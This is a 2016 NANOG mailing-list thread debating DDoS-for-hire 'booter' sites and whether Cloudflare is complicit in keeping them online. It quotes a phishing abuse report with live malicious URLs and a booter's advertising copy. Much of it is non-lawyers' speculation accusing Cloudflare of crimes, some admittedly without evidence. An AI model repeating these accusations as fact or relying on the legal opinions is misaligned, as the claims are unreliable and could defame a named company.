EVERYTHING about Booters (and CloudFlare)
Hi folks, A friend forward me your topic about Booters and CloudFlare. Then I decided to join the NANOG list. The *answer* for the first question about CloudFlare and Booters is at: https://www.youtube.com/watch?v=wW5vJyI_HcU (minute 45:55) given by the _CloudFlare CEO_ in the blackhat2013. I investigate Booters since 2013 and I know many (if not all) the possible aspects about this DDoS-as-a-Service phenomenon. A summary of my entire research (or large part of that) can be watched at https://tnc16.geant.org/web/media/archive/3A (from minute 22:53). On top of that, I developed an algorithm to find Booters and publicly share such list (http://booterblacklist.com/). My main goal with this initiative is to convince people to blacklist and keep on track the users that access Booters (that potentially perform attacks) If you have any question about any aspect of the entire phenomenon don't hesitate to contact me. By the way, I want to help deploy the booters blacklist worldwide and help prosecutors to shutdown this bastards. I have many evidences! Cheers, Jair Santanna jairsantanna.com
Hi Jair, This list is really interesting.
From just a preliminary test, more than half of these domains are hiding behind Cloudflare, and OVH has a sizable fraction too. I suppose it's inevitable, given that both are known for having non-existent abuse departments.
Regards On Wed, Jul 27, 2016 at 9:49 AM, Jair Santanna <j.j.santanna@utwente.nl> wrote:
Hi folks,
A friend forward me your topic about Booters and CloudFlare. Then I decided to join the NANOG list. The *answer* for the first question about CloudFlare and Booters is at: https://www.youtube.com/watch?v=wW5vJyI_HcU (minute 45:55) given by the _CloudFlare CEO_ in the blackhat2013.
I investigate Booters since 2013 and I know many (if not all) the possible aspects about this DDoS-as-a-Service phenomenon. A summary of my entire research (or large part of that) can be watched at https://tnc16.geant.org/web/media/archive/3A (from minute 22:53). On top of that, I developed an algorithm to find Booters and publicly share such list (http://booterblacklist.com/). My main goal with this initiative is to convince people to blacklist and keep on track the users that access Booters (that potentially perform attacks)
If you have any question about any aspect of the entire phenomenon don't hesitate to contact me. By the way, I want to help deploy the booters blacklist worldwide and help prosecutors to shutdown this bastards. I have many evidences!
Cheers,
Jair Santanna jairsantanna.com
-- Regards, Paras President ProTraf Solutions, LLC Enterprise DDoS Mitigation
Hi Paras, I covered the booter topic in a previous reply on a different (though basically the same) thread. By "non-existent" you mean we are processing thousands of reports per week. If you have something to report you can certainly do so at cloudflare.com/abuse. We'd be more than happy to process your report also. Thanks, Justin ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Wed, Jul 27, 2016 at 7:37 AM, Paras Jha <paras@protrafsolutions.com> wrote:
Hi Jair,
This list is really interesting.
From just a preliminary test, more than half of these domains are hiding behind Cloudflare, and OVH has a sizable fraction too. I suppose it's inevitable, given that both are known for having non-existent abuse departments.
Regards
On Wed, Jul 27, 2016 at 9:49 AM, Jair Santanna <j.j.santanna@utwente.nl> wrote:
Hi folks,
A friend forward me your topic about Booters and CloudFlare. Then I decided to join the NANOG list. The *answer* for the first question about CloudFlare and Booters is at: https://www.youtube.com/watch?v=wW5vJyI_HcU (minute 45:55) given by the _CloudFlare CEO_ in the blackhat2013.
I investigate Booters since 2013 and I know many (if not all) the possible aspects about this DDoS-as-a-Service phenomenon. A summary of my entire research (or large part of that) can be watched at https://tnc16.geant.org/web/media/archive/3A (from minute 22:53). On top of that, I developed an algorithm to find Booters and publicly share such list (http://booterblacklist.com/). My main goal with this initiative is to convince people to blacklist and keep on track the users that access Booters (that potentially perform attacks)
If you have any question about any aspect of the entire phenomenon don't hesitate to contact me. By the way, I want to help deploy the booters blacklist worldwide and help prosecutors to shutdown this bastards. I have many evidences!
Cheers,
Jair Santanna jairsantanna.com
-- Regards, Paras
President ProTraf Solutions, LLC Enterprise DDoS Mitigation
Hi Justin, I have submitted abuse reports in the past, maybe from 2014 - 2015, but I gave up after I consistently did not even get replies and saw no action being taken. It is the same behavior with other providers who host malware knowingly. I appreciate you coming out onto the list though, it's nice to see that CF does maintain a presence here. Regards Paras
On Wed, 27 Jul 2016, Paras Jha wrote:
Hi Justin,
I have submitted abuse reports in the past, maybe from 2014 - 2015, but I gave up after I consistently did not even get replies and saw no action being taken. It is the same behavior with other providers who host malware knowingly. I appreciate you coming out onto the list though, it's nice to see that CF does maintain a presence here.
I for one am glad providers are on the case tackling DoS, never ignoring abuse, and doing the best they can to prevent these things: https://www.linkedin.com/pulse/why-do-networking-providers-like-cybercrimina... -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
Because replying admits knowledge and creates a papertrail thereof. Esp. w.r.t. copyright infringement takedown notices etc. (or also because said providers are innundated with such requests because they don't actually care as it's all part of their profit centre.) /kc On Wed, Jul 27, 2016 at 01:35:09PM -0400, Christopher Morrow said:
On Wed, Jul 27, 2016 at 10:58 AM, Paras Jha <paras@protrafsolutions.com> wrote:
I consistently did not even get replies
This is a common 'complaint' point for abuse senders. I often wonder why. What is a reply supposed to do or tell you?
-- Ken Chase - math@sizone.org
From our side:
abuse@ reports generates an auto reply indicating where our reporting form is located. Reports at our reporting form generate an auto reply confirming we received the report. All reports filed via the form are reviewed by a human and at a minimum passed on to the responsible hosting provider so they are aware and they can follow their policies to address with their customer. ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Wed, Jul 27, 2016 at 10:35 AM, Christopher Morrow <morrowc.lists@gmail.com> wrote:
On Wed, Jul 27, 2016 at 10:58 AM, Paras Jha <paras@protrafsolutions.com> wrote:
I consistently did not even get replies
This is a common 'complaint' point for abuse senders. I often wonder why. What is a reply supposed to do or tell you?
On Wednesday 27 July 2016 07:58:49 Paras Jha wrote:
Hi Justin,
I have submitted abuse reports in the past, maybe from 2014 - 2015, but I gave up after I consistently did not even get replies and saw no action being taken. It is the same behavior with other providers who host malware knowingly. I appreciate you coming out onto the list though, it's nice to see that CF does maintain a presence here.
I am not seeing Justin's replies hitting my mailbox, only snipets of quotes and replies... but my experience to date with CloudFlare has been exactly the same, no response or action of any kind to abuse reports. ...Searching... here is an example. Banco do Brasil "you must update your details" phishing fraud using compromised hosts. Example email and for details neccessary to confirm sent to abuse@cloudflare.com on 7/17. Ten days later and the compromised CloudFlare-fronted site is still up and still running. Would there be any confusion if the following abuse report (plus attached original email) arrived in your mailbox? ==================== Phishing / Fraud / Compromised server Phishing URL: http://www.rua.edu.kh/joomla/tecno/porta-bb2.com.jpg/ Redirects to: http://fonecomercial.com.br/admin/wip.php/index.php Redirects to: http://app.flipedition.com/css/www2.bb.com.br.jpg/ Compromised server: www.rua.edu.kh - 203.189.134.18 fonecomercial.com.br - 104.27.148.36 104.27.149.36 app.flipedition.com - 62.75.219.22 ==================== Any guesses who 104.27.148.36 104.27.149.36 is? PlusServer.de (62.75.219.22) terminated the final destination compromised pages within 12 hours... The others are still up. Some providers actively monitor and take control of reported abuses. Some providers actively ignore reported abuses.
From just a preliminary test, more than half of these domains are hiding behind Cloudflare, and OVH has a sizable fraction too.
you mean are using cloudflare and ovh services.
I suppose it's inevitable, given that both are known for having non-existent abuse departments.
as the OP made pretty clear, it's not a matter of an abuse contact. it is the service not acting as a law enforcement agency and asking for a court order. most large service providers operate in that way. randy
Hi Randy, I've found the vast majority of large service providers to be very receptive to abuse reports when they contain evidence and valid information. Regards Paras
I am sure a lawyer would see it very differently, I could see someone looking at this like racketeering. They get paid to provide a service to defend against DDoS, well knowingly hosting people who conduct DDoS attacks. Cloudflare profits from both the victims and the criminals. If Cloudflare isn't acting in good faith to shut down these sites when they receive evidence they are bad actors, they could find themselves in a bit of trouble. At this point Cloudflare would know that these bad actors are hosted on their service since we know many Cloudflare employees subscribe to the NANOG list, and the list of bad actors would now show up in their email server, ready for legal discovery. Disclaimer: I have a ton of respect for Clouldflare and what they do on the internet. -----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Randy Bush Sent: Wednesday, July 27, 2016 8:56 AM To: Paras Jha <paras@protrafsolutions.com> Cc: NANOG list <nanog@nanog.org> Subject: Re: EVERYTHING about Booters (and CloudFlare)
I suppose it's inevitable, given that both are known for having non-existent abuse departments.
as the OP made pretty clear, it's not a matter of an abuse contact. it is the service not acting as a law enforcement agency and asking for a court order. most large service providers operate in that way. randy
As was mentioned in the BlackHat video the DDOS providers don't like competition and they try to take each other out which is they they nee to be on clouadfare. If they were all kicked off of Cloudfare then they would all take each other out leaving no need for clouydfare's DDOS sevices. So by hosting these companies they are ensuring that they will have business. (I have no evidence to this. Just a theory..............) On Wed, Jul 27, 2016 at 11:09 AM, Steve Mikulasik <Steve.Mikulasik@civeo.com
wrote:
I am sure a lawyer would see it very differently, I could see someone looking at this like racketeering. They get paid to provide a service to defend against DDoS, well knowingly hosting people who conduct DDoS attacks. Cloudflare profits from both the victims and the criminals. If Cloudflare isn't acting in good faith to shut down these sites when they receive evidence they are bad actors, they could find themselves in a bit of trouble.
At this point Cloudflare would know that these bad actors are hosted on their service since we know many Cloudflare employees subscribe to the NANOG list, and the list of bad actors would now show up in their email server, ready for legal discovery.
Disclaimer: I have a ton of respect for Clouldflare and what they do on the internet.
-----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Randy Bush Sent: Wednesday, July 27, 2016 8:56 AM To: Paras Jha <paras@protrafsolutions.com> Cc: NANOG list <nanog@nanog.org> Subject: Re: EVERYTHING about Booters (and CloudFlare)
I suppose it's inevitable, given that both are known for having non-existent abuse departments.
as the OP made pretty clear, it's not a matter of an abuse contact. it is the service not acting as a law enforcement agency and asking for a court order. most large service providers operate in that way.
randy
Den 27. jul. 2016 17.12 skrev "Steve Mikulasik" <Steve.Mikulasik@civeo.com>:
Disclaimer: I have a ton of respect for Clouldflare and what they do on
the internet. They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal. Regards Baldur
On Jul 27, 2016, at 9:17 AM, Baldur Norddahl <baldur.norddahl@gmail.com> wrote:
Den 27. jul. 2016 17.12 skrev "Steve Mikulasik" <Steve.Mikulasik@civeo.com>:
Disclaimer: I have a ton of respect for Clouldflare and what they do on
the internet.
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal.
They can monitor (passively or actively) all access to the sites they host, even the ones that use SSL, and they often use their close working relationship with law enforcement to explain why they don't terminate bad actors on their network. You can probably assume that "the feds" are intimately aware of what they're doing. Cheers, Steve
Law enforcement (US or international) knows how to contact us if they have an inquiry to make. We also publish a Transparency Report that covers those legal inquiries: https://www.cloudflare.com/transparency/ ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Wed, Jul 27, 2016 at 9:32 AM, Steve Atkins <steve@blighty.com> wrote:
On Jul 27, 2016, at 9:17 AM, Baldur Norddahl <baldur.norddahl@gmail.com> wrote:
Den 27. jul. 2016 17.12 skrev "Steve Mikulasik" <Steve.Mikulasik@civeo.com>:
Disclaimer: I have a ton of respect for Clouldflare and what they do on
the internet.
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal.
They can monitor (passively or actively) all access to the sites they host, even the ones that use SSL, and they often use their close working relationship with law enforcement to explain why they don't terminate bad actors on their network.
You can probably assume that "the feds" are intimately aware of what they're doing.
Cheers, Steve
This is why policy, as painful as it is to produce, is useful. There isn't even general agreement on whether (or what!) Cloudfare is doing is a problem. Which is why interested parties need to get together and agree on some sort of policy regarding this and similar things. Or not and just let it go. That policy could, at least in theory, be attached to peering agreements, BGP agreements, address allocations, etc as contracts as a means of enforcement. And if necessary presented to law enforcement or courts as clearly defined violations of GAAP. It may not be a law per se but it's the sort of thing a court case might use, say in a civil damages suit or even law enforcement action, to establish that defendant's behavior exhibited reckless disregard and so on. As an analogy you can't accuse someone of mayhem if no one can be bothered to write down what mayhem might be and why the defendant should have known their actions were mayhemic. -- -Barry Shein Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
* goemon@sasami.anime.net (Dan Hollis) [Wed 27 Jul 2016, 20:21 CEST]:
On Wed, 27 Jul 2016, bzs@theworld.com wrote:
There isn't even general agreement on whether (or what!) Cloudfare is doing is a problem.
aiding and abetting. at the very least willful negligence.
I hope the armchairs y'all are lawyering from are comfortable -- Niels.
On Wed, 27 Jul 2016 11:21:02 -0700, Dan Hollis said:
On Wed, 27 Jul 2016, bzs@theworld.com wrote:
There isn't even general agreement on whether (or what!) Cloudfare is doing is a problem.
aiding and abetting. at the very least willful negligence.
aiding and abetting of what, *exactly*? You can't accuse somebody of it until (as Barry Shein pointed out) you have a workable definition of what exactly you're talking about. Similarly, "willful negligence" in most places requires you to draw a dotted line between the alleged negligent action, and some claimed damage or loss on your part - of a form that a court can provide a remedy for.
In message <23235.1469666031@turing-police.cc.vt.edu>, Valdis.Kletnieks@vt.edu writes:
On Wed, 27 Jul 2016 11:21:02 -0700, Dan Hollis said:
On Wed, 27 Jul 2016, bzs@theworld.com wrote:
There isn't even general agreement on whether (or what!) Cloudfare is doing is a problem.
aiding and abetting. at the very least willful negligence.
aiding and abetting of what, *exactly*? You can't accuse somebody of it until (as Barry Shein pointed out) you have a workable definition of what exactly you're talking about. Similarly, "willful negligence" in most places requires you to draw a dotted line between the alleged negligent action, and some claimed damage or loss on your part - of a form that a court can provide a remedy for.
As soon as a transaction takes place, conspiricy to harm <X> by <Y>. If the DoS actually occurs you can add additional charges for the actual actions. This is no different conceptually to hiring a thug to take a baseball bat to a place. You can be charged for consipiricy to commit a crime even if the crime does not occur. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka@isc.org
On Thu, 28 Jul 2016 10:48:47 +1000, Mark Andrews said:
As soon as a transaction takes place, conspiricy to harm <X> by <Y>. If the DoS actually occurs you can add additional charges for the actual actions.
If the claim is that a law has been broken, you have to show that <Y> is actually a crime in the jurisdiction involved. If it's a civil claim, in general only <X> will have standing to actually file suit. That's a big chunk of the problem - the gamer who ticked off another gamer and got DDoSed doesn't have the knowledge, time, or resources to file a claim that will actually accomplish anything, and nobody else can file the claim on their behalf.
This is no different conceptually to hiring a thug to take a baseball bat to a place. You can be charged for consipiricy to commit a crime even if the crime does not occur.
Bringing a baseball bat to a place isn't usually in and of itself illegal. Thug A may bring a bat to someplace, but absent evidence that Thug B will then use said bat for nefarious purposes, you're still left with nothing. You have to draw *all* the dots, Mark. :)
In message <31450.1469667681@turing-police.cc.vt.edu>, Valdis.Kletnieks@vt.edu writes:
On Thu, 28 Jul 2016 10:48:47 +1000, Mark Andrews said:
As soon as a transaction takes place, conspiricy to harm <X> by <Y>. If the DoS actually occurs you can add additional charges for the actual actions.
If the claim is that a law has been broken, you have to show that <Y> is actually a crime in the jurisdiction involved. If it's a civil claim, in general only <X> will have standing to actually file suit. That's a big chun k of the problem - the gamer who ticked off another gamer and got DDoSed doesn' t have the knowledge, time, or resources to file a claim that will actually accomplish anything, and nobody else can file the claim on their behalf.
There have always been plenty of laws to cover DoS attacks. You don't need "with a computer" in the law. You just need to apply existing laws.
This is no different conceptually to hiring a thug to take a baseball bat to a place. You can be charged for consipiricy to commit a crime even if the crime does not occur.
Bringing a baseball bat to a place isn't usually in and of itself illegal. Thug A may bring a bat to someplace, but absent evidence that Thug B will then use said bat for nefarious purposes, you're still left with nothing. You have to draw *all* the dots, Mark. :)
It's the hiring that triggers the conspircy. The crime has been committed the moment there is agreement to perform the act. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka@isc.org
He's right, conspiracy to commit X is a valid criminal charge, at least in the US. Conspiracy to commit fraud, theft, murder, racketeering, etc are all "sister charges" of charges of ones actually carried out.
I am not a lawyer and I don't pretend to be, but I believe
the gamer who ticked off another gamer and got DDoSed doesn't have the knowledge, time, or resources to file a claim that will actually accomplish anything, and nobody else can file the claim on their behalf.
I believe a class action lawsuit would sidestep this. Don't quote me on that though, I may be wrong. On Wed, Jul 27, 2016 at 10:04 PM, Paras Jha <paras@protrafsolutions.com> wrote:
He's right, conspiracy to commit X is a valid criminal charge, at least in the US. Conspiracy to commit fraud, theft, murder, racketeering, etc are all "sister charges" of charges of ones actually carried out.
-- Regards, Paras President ProTraf Solutions, LLC Enterprise DDoS Mitigation
On 7/27/16 10:48 PM, Randy Bush wrote:
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal. hyperbole. it is not criminal. you just don't happen to like it.
Actually, as someone pointed out, it might well be conspiracy - which is criminal. Miles Fidelman -- In theory, there is no difference between theory and practice. In practice, there is. .... Yogi Berra
On Thu, Jul 28, 2016 at 3:55 AM, Miles Fidelman <mfidelman@meetinghouse.net> wrote:
On 7/27/16 10:48 PM, Randy Bush wrote:
They just lost all respect from here. Would someone from USA please
report these guys to the feds? What they are doing is outright criminal.
hyperbole. it is not criminal. you just don't happen to like it.
Actually, as someone pointed out, it might well be conspiracy - which is criminal.
looking forward to the court case, if it's really important it'll happen shortly, right?
On Wed, 27 Jul 2016 22:55:54 -0400, Miles Fidelman said:
On 7/27/16 10:48 PM, Randy Bush wrote:
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal. hyperbole. it is not criminal. you just don't happen to like it.
Actually, as someone pointed out, it might well be conspiracy - which is criminal.
In general, the conspiracy isn't criminal if the conspired act isn't criminal. If you're trying to make a criminal conspiracy out of non-criminal acts, your best bet is probably finding a new way to abuse the RICO statutes.
On 28 July 2016 at 11:30, <Valdis.Kletnieks@vt.edu> wrote:
In general, the conspiracy isn't criminal if the conspired act isn't criminal. If you're trying to make a criminal conspiracy out of non-criminal acts, your best bet is probably finding a new way to abuse the RICO statutes.
DDoS attacks using stolen resources and fake identities is not legal and it is not free speech. Moreover it is illegal just as it is illegal for me to smash your car. Cloudflare are saying they are not smashing any cars. Cloudflare will however act as couriers, provide anonymity and protect anyone that does smash cars. Also Cloudflare sells "protection" against car smashing. But all this is just free speech - sorry no, this is not any better than what the mafia guys are doing in bad parts of the town. Regards, Baldur
On Thu, 28 Jul 2016 12:00:00 +0200, Baldur Norddahl said:
DDoS attacks using stolen resources and fake identities is not legal
Are you making a blanket statement that covers all jurisdictions on the planet? For bonus points - is it more like "illegal as in murder", or "illegal as in jaywalking"? (Hint - which one will you get a DA to actually press a case that almost certainly crosses jurisdictions, and may involve extradition proceedings?)
@Baldur "They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal." I'm happy to put you in touch with an FBI agent if you have questions or concerns you'd like to discuss. ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Thu, Jul 28, 2016 at 4:01 AM, <Valdis.Kletnieks@vt.edu> wrote:
On Thu, 28 Jul 2016 12:00:00 +0200, Baldur Norddahl said:
DDoS attacks using stolen resources and fake identities is not legal
Are you making a blanket statement that covers all jurisdictions on the planet?
For bonus points - is it more like "illegal as in murder", or "illegal as in jaywalking"? (Hint - which one will you get a DA to actually press a case that almost certainly crosses jurisdictions, and may involve extradition proceedings?)
Well, I do not think feeding the trolls is a good exercise for a representative of any company that is taking this subject seriously. Don't you think? ----- Alain Hebert ahebert@pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 07/28/16 09:07, Justin Paine via NANOG wrote:
@Baldur
"They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal."
I'm happy to put you in touch with an FBI agent if you have questions or concerns you'd like to discuss.
____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D
On Thu, Jul 28, 2016 at 4:01 AM, <Valdis.Kletnieks@vt.edu> wrote:
On Thu, 28 Jul 2016 12:00:00 +0200, Baldur Norddahl said:
DDoS attacks using stolen resources and fake identities is not legal Are you making a blanket statement that covers all jurisdictions on the planet?
For bonus points - is it more like "illegal as in murder", or "illegal as in jaywalking"? (Hint - which one will you get a DA to actually press a case that almost certainly crosses jurisdictions, and may involve extradition proceedings?)
A DDoS attack is illegal. In the United States it is considered as theft of service. The legal construct used is that the DDoS attack is a theft of CPU cycles, compute resources, and power by other than the rightful owner for its intended purposes. Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu Sent: Thursday, July 28, 2016 4:30 AM To: Miles Fidelman Cc: nanog@nanog.org Subject: Re: EVERYTHING about Booters (and CloudFlare) On Wed, 27 Jul 2016 22:55:54 -0400, Miles Fidelman said:
On 7/27/16 10:48 PM, Randy Bush wrote:
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal. hyperbole. it is not criminal. you just don't happen to like it.
Actually, as someone pointed out, it might well be conspiracy - which is criminal.
In general, the conspiracy isn't criminal if the conspired act isn't criminal. If you're trying to make a criminal conspiracy out of non-criminal acts, your best bet is probably finding a new way to abuse the RICO statutes.
If you believe someone is doing something illegal than you should report it to law enforcement. Their job is to investigate and bring charges if they feel they are warranted. You do not have to be from the USA to report a crime in the USA. Here is a list with contact info for the FBI's field offices: https://www.fbi.gov/contact-us/field-offices FBI Headquarters: https://www.fbi.gov/contact-us/fbi-headquarters List of overseas offices for those of you not in the US that want to talk to someone local: https://www.fbi.gov/contact-us/legal-attache-offices Most network operators are not law enforcement or lawyers. Aaron On 7/28/2016 8:45 AM, Naslund, Steve wrote:
A DDoS attack is illegal. In the United States it is considered as theft of service. The legal construct used is that the DDoS attack is a theft of CPU cycles, compute resources, and power by other than the rightful owner for its intended purposes.
Steven Naslund Chicago IL
-----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu Sent: Thursday, July 28, 2016 4:30 AM To: Miles Fidelman Cc: nanog@nanog.org Subject: Re: EVERYTHING about Booters (and CloudFlare)
On Wed, 27 Jul 2016 22:55:54 -0400, Miles Fidelman said:
On 7/27/16 10:48 PM, Randy Bush wrote:
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal. hyperbole. it is not criminal. you just don't happen to like it. Actually, as someone pointed out, it might well be conspiracy - which is criminal. In general, the conspiracy isn't criminal if the conspired act isn't criminal. If you're trying to make a criminal conspiracy out of non-criminal acts, your best bet is probably finding a new way to abuse the RICO statutes.
-- ================================================================ Aaron Wendel Chief Technical Officer Wholesale Internet, Inc. (AS 32097) (816)550-9030 http://www.wholesaleinternet.com ================================================================
I'm sorry, but this entire discussion is predicated on half-truths and nonsense spewing out of the CF team. It's a shame too, as they're usually great community minded folks who are well respected around here. No matter how you define the CloudFlare service, that they can claim ignorance due to "common carrier" passthrough is preposterous, especially given their purported knowledge of what's going on. Likewise if the booter sites were connected to any other CDN, WAF/proxy, public cloud provider, etc. Call it what you want, but at the end of the day, they're providing connectivity and keeping the storefront online. Want the problem stopped? Easy, stop it at the source by denying them service. Every service provider (or its upstream at some point) has an AUP which prevents the service from being used for illegal purposes. Telling NANOG members that they don't understand the nature of the CF service, and that they should somehow get a pass, is dishonest. That they're keeping these criminals online at the requirement of the FBI? Anyone who's actually worked with law enforcement can tell you that the first rule of fight club is to NOT talk about it, especially if you're under gag order. A more likely story is they're just doing this for the attention, and basking in it, kind of like a certain blog post suggesting they pioneered the practice of configuring hosts with LACP for throughput and HA. If Justin/Matthew/Martin/etc. are listening, I implore you to do the right thing and stop providing service to criminals. Full stop, without caving in to your very talented marketing department. And to everyone else, I'd ask you to do what you think is right, and treat CloudFlare's anycasted IP blocks as you would any other network harboring criminal activity and security risk to the detriment of your customers. (Is Team CYMRU listening?) Much like the original spam problem in the 90s, the collateral damage might be annoying at first, but the end will justify the means. Drive Slow (like a souped up Supra), Paul Wall On Wed, Jul 27, 2016 at 10:48 PM, Randy Bush <randy@psg.com> wrote:
They just lost all respect from here. Would someone from USA please report these guys to the feds? What they are doing is outright criminal.
hyperbole. it is not criminal. you just don't happen to like it.
Nothing is going to happen. Cloudflare will continue to turn a blind eye towards abusive customers, and even downright allow customers to HTTP scan from their network without batting an eyelash. The mere act of scanning isn't illegal, but it shows the kind of mindset that they have.
On 7/28/16 11:04 AM, Paras Jha wrote:
Nothing is going to happen. Cloudflare will continue to turn a blind eye towards abusive customers, and even downright allow customers to HTTP scan from their network without batting an eyelash. The mere act of scanning isn't illegal, but it shows the kind of mindset that they have.
Let's see: Vbooter (on their home page) claims: "#1 FREE WEBBASED SERVER STRESSER" "Using vBooter you can take down home internet connections, websites and game servers such us Minecraft, XBOX Live, PSN and many more." "You don't have to pay anything in order to use this stresser! In addition there are NO limits if you are a free user." So they're advertising a free service that explicitly offers DDoS capabilities. Now - with the caveat that I'm not a lawyer, and I'm talking from a US perspective only - as a sometimes hosting provider who pays attention to our legal liabilities, and who's had one of our boxes compromised and used to vector a DDoS against a gaming site.... 1. DDoS is clearly illegal under multiple statutes - most notably the Computer Fraud and Abuse Act - see https://www.justice.gov/sites/default/files/criminal-ccips/legacy/2015/01/14... - for a Justice Dept. memo on "Prosecuting Computer Crimes." When coupled with threats, requests for payoffs, etc. - it expands into lots of other crimes (e.g., extortion). And that's before one starts attacking Government-owned computer systems. 2. One might infer that, while "stress testing" is a legitimate and useful service - under specific circumstances, vBooter's tools might also fall under laws regarding being an accomplice to a criminal act, aiding & abetting, "burglar's tools," etc., and more generally "creating a public nuisance." 3. There are also various (mostly state) laws against the sale of burglar's tools (e.g., sale of a lockpick to someone who's not a professional locksmith). I expect some of those laws might apply. 4. All of those certainly could be applied to vBooter.org. Whether Cloudflare is liable for anything would seem to depend on whether Cloudflare is complicit in the use of vBooter's use for criminal purposes, or promoting it's use therefore. Hosting would certainly fall into that category - and while, I have no direct knowledge that Cloudflare hosts vBooter, they do provide nameservice, and their web server's IP address is in a network block registered to Cloudflare - that would seem to establish complicity. Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an interesting test case for RICO (akin to McAfee encouraging folks to write and release viruses). As to whether "Nothing is going to happen" - I expect something WILL happen, when somebody big, with a good legal department, gets hit by a really damaging DDoS attack, and starts looking for some deep pockets to sue. Or, if somebody attacks the wrong Government computer and the FBI, or DoD, or DHS get ticked off. It will make for very good theater - at least for anyone not directly in the cross-hairs. Miles Fidelman -- In theory, there is no difference between theory and practice. In practice, there is. .... Yogi Berra
* mfidelman@meetinghouse.net (Miles Fidelman) [Thu 28 Jul 2016, 17:42 CEST]: [...]
Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an interesting test case for RICO
CloudFlare is doing nothing of the sort, and it's kind of vile for you to suggest otherwise, even ostensibly by way of floating it as a hypothetical. -- Niels.
On 7/28/16 11:56 AM, Niels Bakker wrote:
* mfidelman@meetinghouse.net (Miles Fidelman) [Thu 28 Jul 2016, 17:42 CEST]: [...]
Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an interesting test case for RICO
CloudFlare is doing nothing of the sort, and it's kind of vile for you to suggest otherwise, even ostensibly by way of floating it as a hypothetical.
Well, I don't know - if I were in the business of selling security services, I'd probably suggest that potential customers do some penetration and stress testing of their systems. And that seems pretty legitimate. For that matter - "here are some tools you can use to test your systems" also strikes me as pretty legitimate. On the other hand - one might argue that publishing something like "How to Launch a 65Gbps DDoS, and How to Stop One" https://blog.cloudflare.com/65gbps-ddos-no-problem/ - pushes the limits a bit - depending on how much detailed "how-to" information one provides, and how much one presents oneself as the solution. Granted, that there's a lot of value in education - I certainly want to know the various ways folks might attack our systems, and the various ways we might defend ourselves. But there are limits - not just legal ones, but, as others have pointed out, ethical ones and ones of good taste. The CERT draws its lines one place; on the other hand, Symantec publishes white papers that give some rather in depth analyses of specific viruses - there for the googling. Cloudflare certainly comes closer to one line than the other. Opinions vary as to the ethics, taste, and legality of publishing detailed how-to information - there's certainly enough out there from sources with ill intent (including rather nasty libraries and tools that require little technical expertise to utilize) - so I tend to favor more details. When one directly ties detailed how-to information, with product/service sales - now that strikes me as begging to be the target of some interesting test cases. In Cloudflare's case - telling people how to attack a site, hosting free & openly available tools that can support such an attack, and selling services to mitigate the attack - now that's a test case just waiting to happen. "How to Launch a 65Gbps DDoS, and How to Stop One" seems like an open invitation to ambulance chasers and aggressive prosecutors. Miles Fidelman -- In theory, there is no difference between theory and practice. In practice, there is. .... Yogi Berra
Miles is right. Their thinly veiled "stress tester" thing is not going to be much of a defense. They must not have very good legal counsel. Here is the issue. Stress testing is perfectly legal as long as I am: a) Stress testing my own stuff b) Stress testing your stuff WITH YOUR CONSENT Selling a product or service that is unsafe can lead to serious civil consequences. For example, I sell you roach killer and don't warn you that it will also kill every other living thing in your home, I am going to get sued and lose badly. Let's say I am running a demolition company that offers to knock down any house for a price. Don't you think I have a responsibility to verify that you own the house you just asked me to knock down? (by the way, this has happened in the real world -wrong address on paperwork- and the demolition company was held liable) Obviously I have that responsibility and obviously the same rules would apply to any service that can potentially damage someone's property. Steven Naslund Chicago IL
Let's see:
